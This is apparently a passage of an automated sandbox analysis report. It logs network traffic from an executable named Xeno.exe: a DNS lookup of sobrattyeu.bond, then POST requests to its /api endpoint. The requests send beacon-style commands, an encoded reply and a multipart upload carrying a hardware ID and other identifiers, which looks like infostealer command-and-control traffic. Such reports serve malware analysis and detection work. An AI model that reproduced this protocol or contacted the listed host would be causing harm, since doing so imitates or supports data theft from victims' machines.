                          Jan 15, 2025 16:16:28.558677912 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.558715105 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.568193913 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.568365097 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.568401098 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.568416119 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.568432093 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.568440914 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.568486929 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.568542957 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.568588972 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.568634987 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.573245049 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:28.573307991 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:28.573323011 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:33.855189085 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:33.855494022 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:33.855567932 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:33.855735064 CET | 49749 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:33.855767012 CET | 443 | 49749 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:33.860513926 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:33.860584021 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:33.860656977 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:33.860948086 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:33.860965967 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.345982075 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.346120119 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:34.347466946 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:34.347484112 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.347866058 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.349489927 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:34.349522114 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:34.349570990 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.853410006 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.853645086 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.853740931 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.853832960 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.853833914 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:34.853879929 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.853903055 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:34.854015112 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.854063034 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:34.854073048 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.854170084 CET | 443 | 49750 | 104.21.96.1 | 192.168.2.4
                          Jan 15, 2025 16:16:34.854226112 CET | 49750 | 443 | 192.168.2.4 | 104.21.96.1
                          Jan 15, 2025 16:16:34.854233027 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.857933044 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.857995033 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.858023882 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.858218908 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.858272076 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.858423948 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.858449936 CET44349750104.21.96.1192.168.2.4
                          Jan 15, 2025 16:16:34.858474016 CET49750443192.168.2.4104.21.96.1
                          Jan 15, 2025 16:16:34.858481884 CET44349750104.21.96.1192.168.2.4
                          Timestamp  Source Port  Dest Port  Source IP  Dest IP
                          Jan 15, 2025 16:16:07.627458096 CET  55761  53  192.168.2.4  1.1.1.1
                          Jan 15, 2025 16:16:07.640410900 CET  53  55761  1.1.1.1  192.168.2.4
                          Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
                          Jan 15, 2025 16:16:07.627458096 CET  192.168.2.4  1.1.1.1  0x89f4  Standard query (0)  sobrattyeu.bond  A (IP address)  IN (0x0001)  false
                          Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
                          Jan 15, 2025 16:16:07.640410900 CET  1.1.1.1  192.168.2.4  0x89f4  No error (0)  sobrattyeu.bond  -  104.21.96.1  A (IP address)  IN (0x0001)  false
                          Jan 15, 2025 16:16:07.640410900 CET  1.1.1.1  192.168.2.4  0x89f4  No error (0)  sobrattyeu.bond  -  104.21.48.1  A (IP address)  IN (0x0001)  false
                          Jan 15, 2025 16:16:07.640410900 CET  1.1.1.1  192.168.2.4  0x89f4  No error (0)  sobrattyeu.bond  -  104.21.16.1  A (IP address)  IN (0x0001)  false
                          Jan 15, 2025 16:16:07.640410900 CET  1.1.1.1  192.168.2.4  0x89f4  No error (0)  sobrattyeu.bond  -  104.21.64.1  A (IP address)  IN (0x0001)  false
                          Jan 15, 2025 16:16:07.640410900 CET  1.1.1.1  192.168.2.4  0x89f4  No error (0)  sobrattyeu.bond  -  104.21.80.1  A (IP address)  IN (0x0001)  false
                          Jan 15, 2025 16:16:07.640410900 CET  1.1.1.1  192.168.2.4  0x89f4  No error (0)  sobrattyeu.bond  -  104.21.112.1  A (IP address)  IN (0x0001)  false
                          Jan 15, 2025 16:16:07.640410900 CET  1.1.1.1  192.168.2.4  0x89f4  No error (0)  sobrattyeu.bond  -  104.21.32.1  A (IP address)  IN (0x0001)  false
                          • sobrattyeu.bond
                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                          0  192.168.2.4  49731  104.21.96.1  443  3020  C:\Users\user\Desktop\Xeno.exe
                          Timestamp  Bytes transferred  Direction  Data
                          2025-01-15 15:16:08 UTC  262  OUT  POST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 8
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:08 UTC  8  OUT  Data Raw: 61 63 74 3d 6c 69 66 65
                          Data Ascii: act=life
                          2025-01-15 15:16:08 UTC  1125  IN  HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=4k1fn448hi356mkp89f05q5jtb; expires=Sun, 11 May 2025 09:02:47 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2BALVQZt1voE34jIPldZhA7YVo%2FPAVmy3i801oHrUNiHInMhZZZ1irPvAe8TlXOj%2B5Lw54fVoXNbGuLBJ9yxrdGLIIofq0R6YIC3eRmEqcYaUNQsdIsKu%2B06EvPOuXQ4CzU%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d340193a42c0-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1708&rtt_var=644&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1695702&cwnd=212&unsent_bytes=0&cid=da12fd3111880800&ts=551&x=0"
                          2025-01-15 15:16:08 UTC  7  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a
                          Data Ascii: 2ok
                          2025-01-15 15:16:08 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                          1  192.168.2.4  49733  104.21.96.1  443  3020  C:\Users\user\Desktop\Xeno.exe
                          Timestamp  Bytes transferred  Direction  Data
                          2025-01-15 15:16:09 UTC  263  OUT  POST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 51
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:09 UTC  51  OUT  Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 26 6a 3d
                          Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--914510980&j=
                          2025-01-15 15:16:10 UTC  1127  IN  HTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=0g8a7o6jujrdd64bfsiqn8ba5o; expires=Sun, 11 May 2025 09:02:49 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3OOJAvguJDZtvc1w0OnD%2F2bP5QXmqH82SwOtTDga%2FX%2BhAlKFCatLORRuNqI9iuH4%2FZiyEdAu6GVSyhk5o5YtxfFCnEahW%2BN9TBwKdUQjpSi5rlzc2KmOrLrb1MY6xDz85OM%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3499eaa72a4-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1964&rtt_var=752&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=950&delivery_rate=1439842&cwnd=212&unsent_bytes=0&cid=e323a9ece74c9fa8&ts=512&x=0"
                          2025-01-15 15:16:10 UTC  242  IN  Data Raw: 63 34 39 0d 0a 35 2b 35 53 71 7a 65 4c 31 77 71 33 43 39 51 4a 68 2b 78 37 43 78 70 34 69 47 74 4c 54 41 2b 45 56 62 6a 4d 77 6a 49 38 72 48 47 63 7a 43 53 4a 44 62 2f 37 4b 4d 52 75 39 6a 50 7a 6e 67 35 75 4e 6c 72 70 44 32 6c 32 61 65 55 35 79 36 6e 75 45 45 72 42 55 39 32 49 4d 38 64 45 37 76 73 6f 30 6e 50 32 4d 39 79 58 57 57 35 30 57 72 4a 4a 4c 69 5a 74 35 54 6e 61 72 61 6c 64 54 4d 41 53 6a 34 49 31 77 31 4c 6f 73 32 76 62 5a 72 46 73 34 6f 30 52 5a 58 4d 56 34 41 5a 70 59 43 33 68 4c 35 72 32 34 48 39 5a 32 42 43 71 6a 79 48 41 46 66 62 37 63 5a 56 75 75 69 75 39 7a 68 70 75 65 42 54 75 44 79 41 6b 5a 2b 77 78 32 36 69 6f 51 6c 58 4b 47 59 2b 4d 4e 73 4a 59 34 61 64 6d 30 57 47 36 61 75 69 4e 57 53 63 34 48
                          Data Ascii: c495+5SqzeL1wq3C9QJh+x7Cxp4iGtLTA+EVbjMwjI8rHGczCSJDb/7KMRu9jPzng5uNlrpD2l2aeU5y6nuEErBU92IM8dE7vso0nP2M9yXWW50WrJJLiZt5TnaraldTMASj4I1w1Los2vbZrFs4o0RZXMV4AZpYC3hL5r24H9Z2BCqjyHAFfb7cZVuuiu9zhpueBTuDyAkZ+wx26ioQlXKGY+MNsJY4adm0WG6auiNWSc4H
                          2025-01-15 15:16:10 UTC  1369  IN  Data Raw: 66 4a 4a 63 57 34 2b 31 44 54 4c 76 37 56 64 54 73 68 54 6d 73 49 70 69 56 4c 6c 39 54 43 56 59 62 70 6c 34 49 30 57 62 6e 6b 61 2b 41 59 70 4c 57 58 75 4d 39 43 68 72 31 39 51 78 42 53 4e 68 54 66 47 55 75 47 7a 5a 39 59 70 2b 43 76 69 6c 6c 6b 78 4f 44 72 36 43 69 6f 36 59 50 64 33 78 65 43 35 45 46 6e 43 55 39 33 4d 4e 73 64 55 35 4c 56 36 33 57 4b 39 62 76 65 46 45 47 52 31 47 75 63 44 4a 69 31 74 34 54 33 51 6f 61 70 55 55 38 4d 56 68 59 78 77 68 78 58 75 72 53 69 4e 4b 5a 56 75 39 59 6b 56 66 7a 6f 67 71 68 5a 6e 4e 79 33 68 4f 35 72 32 34 46 68 62 7a 52 43 4f 67 7a 50 42 58 76 75 31 65 74 4e 6b 73 33 6e 6a 69 78 64 6a 65 77 6a 67 42 79 38 74 5a 4f 30 2b 33 36 6d 6b 45 42 43 4f 46 4a 33 4d 61 49 6c 30 35 4c 35 6b 33 33 36 32 4b 2f 72 41 41 43 6c 2f
                          Data Ascii: fJJcW4+1DTLv7VdTshTmsIpiVLl9TCVYbpl4I0Wbnka+AYpLWXuM9Chr19QxBSNhTfGUuGzZ9Yp+CvillkxODr6Cio6YPd3xeC5EFnCU93MNsdU5LV63WK9bveFEGR1GucDJi1t4T3QoapUU8MVhYxwhxXurSiNKZVu9YkVfzogqhZnNy3hO5r24FhbzRCOgzPBXvu1etNks3njixdjewjgBy8tZO0+36mkEBCOFJ3MaIl05L5k3362K/rAACl/
                          2025-01-15 15:16:10 UTC  1369  IN  Data Raw: 38 68 59 4f 70 33 6c 4f 36 6e 53 42 36 57 55 36 2b 50 4a 4d 70 66 71 34 42 72 32 32 65 78 66 61 57 52 56 33 41 34 48 65 5a 4a 63 57 35 67 35 7a 2f 63 76 4b 39 64 58 63 41 64 69 6f 6b 2f 77 56 58 70 75 47 33 52 59 72 31 6f 36 49 6f 4c 59 33 67 53 37 77 67 6a 4a 43 32 6f 64 39 32 32 34 41 67 65 2f 77 53 4f 7a 67 58 4b 57 2b 65 79 66 70 56 32 2b 48 4b 6c 69 52 55 70 49 46 72 6e 41 53 77 72 59 75 63 39 31 4b 75 71 58 46 62 41 45 4a 65 44 4e 4d 6c 5a 34 62 39 6c 32 32 32 2b 59 75 36 46 48 32 6c 35 45 4b 70 48 61 53 6c 31 70 6d 2b 61 6d 71 64 63 55 38 46 52 73 49 38 2b 78 31 4c 2f 39 58 65 62 63 50 5a 73 36 63 35 42 4b 58 51 54 36 67 49 6a 4b 6d 33 68 4f 74 2b 74 70 31 4e 54 79 52 6d 4c 69 7a 54 46 58 4f 53 7a 61 4e 4a 74 73 33 6e 67 68 78 56 6c 4f 46 53 71 44
                          Data Ascii: 8hYOp3lO6nSB6WU6+PJMpfq4Br22exfaWRV3A4HeZJcW5g5z/cvK9dXcAdiok/wVXpuG3RYr1o6IoLY3gS7wgjJC2od9224Age/wSOzgXKW+eyfpV2+HKliRUpIFrnASwrYuc91KuqXFbAEJeDNMlZ4b9l222+Yu6FH2l5EKpHaSl1pm+amqdcU8FRsI8+x1L/9XebcPZs6c5BKXQT6gIjKm3hOt+tp1NTyRmLizTFXOSzaNJts3nghxVlOFSqD
                          2025-01-15 15:16:10 UTC  172  IN  Data Raw: 2f 64 39 32 69 34 41 67 65 78 78 71 58 67 6a 37 41 57 4f 2b 39 62 39 74 6b 76 57 33 75 69 52 35 76 64 52 4c 6e 44 43 6f 76 61 65 77 6c 32 61 57 71 58 56 53 4f 58 63 57 4c 4b 49 6b 4e 71 5a 4a 6b 2f 48 6d 74 65 66 50 4f 42 69 64 68 57 75 30 46 61 58 59 74 35 54 6a 54 6f 61 68 59 55 63 45 58 69 34 6f 32 78 46 44 6d 76 33 72 64 5a 37 74 67 36 6f 55 4c 61 58 55 65 35 67 30 68 4a 57 65 6d 65 5a 71 70 75 42 41 47 6a 69 61 49 67 7a 44 4b 51 36 6d 71 4a 73 77 70 73 57 65 6c 31 6c 6c 6c 64 68 72 6c 42 53 55 6c 5a 0d 0a
                          Data Ascii: /d92i4AgexxqXgj7AWO+9b9tkvW3uiR5vdRLnDCovaewl2aWqXVSOXcWLKIkNqZJk/HmtefPOBidhWu0FaXYt5TjToahYUcEXi4o2xFDmv3rdZ7tg6oULaXUe5g0hJWemeZqpuBAGjiaIgzDKQ6mqJswpsWel1llldhrlBSUlZ
                          2025-01-15 15:16:10 UTC  1369  IN  Data Raw: 33 64 34 62 0d 0a 65 63 37 31 4b 6d 6c 57 56 62 47 41 59 53 49 4f 4d 68 62 35 72 52 73 30 47 79 79 62 4f 47 49 46 69 6b 32 57 75 30 52 61 58 59 74 79 52 44 76 37 49 46 71 48 74 46 64 6e 4d 77 33 78 52 57 78 39 57 54 57 5a 62 35 6b 34 34 63 56 59 33 45 52 35 67 49 74 49 6d 54 6a 4d 64 75 72 70 56 46 61 77 68 6d 44 6a 7a 50 47 57 75 61 39 4b 4a 73 70 73 58 4f 6c 31 6c 6c 4d 62 78 48 6b 44 32 6b 78 49 2f 39 33 33 61 4c 67 43 42 37 43 47 6f 4f 4b 4e 63 56 55 37 37 31 74 33 57 32 33 62 65 4f 4e 46 6d 31 39 47 2b 55 4e 4a 53 42 6e 35 7a 62 57 70 61 39 62 57 34 35 64 78 59 73 6f 69 51 32 70 68 47 76 44 66 71 5a 6e 70 5a 46 58 63 44 67 64 35 6b 6c 78 62 6d 7a 30 50 64 43 67 70 56 39 62 7a 52 79 43 67 54 62 46 58 2b 43 39 62 74 70 67 70 47 6a 70 67 42 35 6e 64 42
                          Data Ascii: 3d4bec71KmlWVbGAYSIOMhb5rRs0GyybOGIFik2Wu0RaXYtyRDv7IFqHtFdnMw3xRWx9WTWZb5k44cVY3ER5gItImTjMdurpVFawhmDjzPGWua9KJspsXOl1llMbxHkD2kxI/933aLgCB7CGoOKNcVU771t3W23beONFm19G+UNJSBn5zbWpa9bW45dxYsoiQ2phGvDfqZnpZFXcDgd5klxbmz0PdCgpV9bzRyCgTbFX+C9btpgpGjpgB5ndB
                          2025-01-15 15:16:10 UTC  1369  IN  Data Raw: 4b 57 72 76 50 4d 69 6b 70 31 64 56 78 68 69 4b 69 69 4c 46 57 2f 75 77 65 73 63 70 2b 43 76 69 6c 6c 6b 78 4f 43 7a 74 47 54 6b 74 4c 39 63 68 32 62 69 72 58 56 4b 4f 44 4d 75 56 63 4d 35 5a 71 65 30 6f 30 32 61 2f 61 4f 71 50 45 47 56 31 48 2b 4d 4d 4b 43 68 70 37 44 33 61 71 4b 5a 52 57 38 51 51 68 49 59 35 7a 6c 33 75 74 6e 71 56 4a 2f 5a 73 2f 63 35 42 4b 56 45 64 2b 41 63 35 62 6e 4b 6f 4c 70 71 70 72 42 41 47 6a 68 65 50 67 7a 54 4f 57 65 2b 77 62 74 68 6f 75 57 72 6c 67 52 31 69 63 52 7a 72 42 43 77 6a 61 66 51 39 30 61 47 73 57 56 4c 44 55 38 76 4d 4e 39 45 56 73 66 56 5a 32 47 65 34 62 50 50 4f 42 69 64 68 57 75 30 46 61 58 59 74 35 7a 76 56 72 61 39 54 58 63 38 5a 6c 35 34 38 77 46 33 73 75 57 50 62 62 36 52 74 36 6f 63 61 61 6e 45 64 34 67 55
                          Data Ascii: KWrvPMikp1dVxhiKiiLFW/uwescp+CvillkxOCztGTktL9ch2birXVKODMuVcM5Zqe0o02a/aOqPEGV1H+MMKChp7D3aqKZRW8QQhIY5zl3utnqVJ/Zs/c5BKVEd+Ac5bnKoLpqprBAGjhePgzTOWe+wbthouWrlgR1icRzrBCwjafQ90aGsWVLDU8vMN9EVsfVZ2Ge4bPPOBidhWu0FaXYt5zvVra9TXc8Zl548wF3suWPbb6Rt6ocaanEd4gU
                          2025-01-15 15:16:10 UTC  1369  IN  Data Raw: 53 61 61 39 72 5a 41 53 63 6b 4d 79 35 56 77 7a 6c 6d 70 37 53 6a 54 59 4c 42 73 34 34 41 4c 62 48 34 56 35 51 41 67 4b 6d 58 6c 4e 39 36 71 70 31 56 64 77 68 69 43 6a 7a 2f 4e 58 4f 65 38 5a 35 55 6e 39 6d 7a 39 7a 6b 45 70 57 51 48 70 42 53 52 75 63 71 67 75 6d 71 6d 73 45 41 61 4f 48 34 75 4a 4d 4d 4e 54 37 62 42 75 33 32 79 32 59 4f 61 42 48 57 39 38 46 65 6f 43 49 43 39 72 34 7a 33 52 71 4b 31 54 57 4d 68 54 79 38 77 33 30 52 57 78 39 55 6a 4f 5a 4c 70 73 70 5a 46 58 63 44 67 64 35 6b 6c 78 62 6d 62 71 4d 39 32 75 72 56 4e 57 79 78 65 50 69 54 44 42 52 2b 47 31 62 38 64 37 74 6d 4c 67 67 68 70 70 66 42 7a 6a 44 79 6f 71 4c 61 68 33 33 62 62 67 43 42 37 6a 48 34 4b 6c 4e 39 49 56 39 76 74 78 6c 57 36 36 4b 37 33 4f 47 47 4a 79 46 65 63 4b 4c 79 31 6d
                          Data Ascii: Saa9rZASckMy5Vwzlmp7SjTYLBs44ALbH4V5QAgKmXlN96qp1VdwhiCjz/NXOe8Z5Un9mz9zkEpWQHpBSRucqgumqmsEAaOH4uJMMNT7bBu32y2YOaBHW98FeoCIC9r4z3RqK1TWMhTy8w30RWx9UjOZLpspZFXcDgd5klxbmbqM92urVNWyxePiTDBR+G1b8d7tmLgghppfBzjDyoqLah33bbgCB7jH4KlN9IV9vtxlW66K73OGGJyFecKLy1m
                          2025-01-15 15:16:10 UTC  1369  IN  Data Raw: 65 35 45 45 69 4f 53 39 66 43 63 4e 73 56 73 66 55 76 31 6e 75 6b 62 65 61 59 47 69 35 47 4a 4d 30 66 49 79 6c 39 34 53 44 56 37 75 34 51 55 59 35 4c 76 4d 77 35 7a 6b 37 34 6f 32 58 46 62 76 5a 55 71 38 34 42 4b 53 42 61 33 77 6f 6e 49 47 72 77 4a 70 65 4a 74 6c 70 5a 33 68 53 53 67 33 43 48 46 65 2f 31 4d 49 59 6e 39 6d 2f 30 7a 6b 45 35 4b 6b 47 2f 57 6e 35 2b 50 2f 6c 35 77 2b 36 32 45 41 61 63 58 63 57 65 63 4a 45 56 72 72 5a 36 78 32 2b 31 66 65 62 4a 4a 31 64 66 41 4f 63 50 50 6a 39 54 32 44 44 41 6f 36 5a 48 54 34 49 47 68 6f 49 2b 7a 6b 4f 70 2b 79 6a 61 4b 65 35 53 70 63 5a 5a 56 6a 5a 61 38 6b 6c 78 62 6c 6a 6c 4f 64 53 70 74 6b 45 54 36 51 6d 49 69 69 66 59 46 61 66 31 62 70 55 78 35 43 57 6c 69 67 67 70 49 45 71 34 55 6e 78 39 4f 72 5a 6c 78
                          Data Ascii: e5EEiOS9fCcNsVsfUv1nukbeaYGi5GJM0fIyl94SDV7u4QUY5LvMw5zk74o2XFbvZUq84BKSBa3wonIGrwJpeJtlpZ3hSSg3CHFe/1MIYn9m/0zkE5KkG/Wn5+P/l5w+62EAacXcWecJEVrrZ6x2+1febJJ1dfAOcPPj9T2DDAo6ZHT4IGhoI+zkOp+yjaKe5SpcZZVjZa8klxbljlOdSptkET6QmIiifYFaf1bpUx5CWliggpIEq4Unx9OrZlx
                          2025-01-15 15:16:10 UTC  1369  IN  Data Raw: 65 68 6c 4f 36 77 6e 44 52 46 62 48 31 58 64 5a 6e 75 47 7a 7a 6e 31 52 42 57 79 44 51 53 77 55 70 65 4b 51 44 33 62 36 78 57 31 50 43 55 38 76 4d 4e 6f 6b 4e 75 66 73 6f 30 58 6a 32 4d 37 58 63 51 6a 77 72 54 62 70 62 4e 6d 42 30 70 69 47 61 39 76 49 65 48 74 78 54 33 63 78 33 79 6b 66 37 73 32 76 44 61 76 46 56 32 36 6b 58 62 6e 6b 4d 2b 68 34 6d 45 46 50 7a 4e 4e 53 67 70 30 5a 50 6a 6c 33 46 67 33 43 52 62 4b 6e 39 4b 4f 6f 6e 39 6e 4f 6c 31 6c 6c 63 65 78 54 6b 44 6a 38 2f 49 4d 45 35 33 61 2b 32 51 45 6e 42 55 38 76 4d 4e 6f 6b 4e 75 2f 73 6f 30 58 6a 32 4d 37 58 63 51 6a 77 72 54 62 70 62 4e 6d 42 30 70 69 47 61 39 76 49 65 48 74 78 54 33 63 78 33 79 6b 66 37 73 32 76 44 61 76 46 56 32 36 6b 58 62 6e 6b 4d 2b 68 34 6d 59 55 50 51 46 75 53 51 74 56
                          Data Ascii: ehlO6wnDRFbH1XdZnuGzzn1RBWyDQSwUpeKQD3b6xW1PCU8vMNokNufso0Xj2M7XcQjwrTbpbNmB0piGa9vIeHtxT3cx3ykf7s2vDavFV26kXbnkM+h4mEFPzNNSgp0ZPjl3Fg3CRbKn9KOon9nOl1llcexTkDj8/IME53a+2QEnBU8vMNokNu/so0Xj2M7XcQjwrTbpbNmB0piGa9vIeHtxT3cx3ykf7s2vDavFV26kXbnkM+h4mYUPQFuSQtV


                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                          2  192.168.2.4  49737  104.21.96.1  443  3020  C:\Users\user\Desktop\Xeno.exe
                          Timestamp  Bytes transferred  Direction  Data
                          2025-01-15 15:16:11 UTC  273  OUT  POST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=0C84Y36Y3O
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 18119
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:11 UTC  15331  OUT  Data Raw: 2d 2d 30 43 38 34 59 33 36 59 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32 0d 0a 2d 2d 30 43 38 34 59 33 36 59 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 43 38 34 59 33 36 59 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 30 43 38 34 59 33 36 59 33 4f 0d 0a 43 6f 6e 74
                          Data Ascii: --0C84Y36Y3OContent-Disposition: form-data; name="hwid"48DD14122033DD2BC61BA3BAD8862B62--0C84Y36Y3OContent-Disposition: form-data; name="pid"2--0C84Y36Y3OContent-Disposition: form-data; name="lid"yau6Na--914510980--0C84Y36Y3OCont
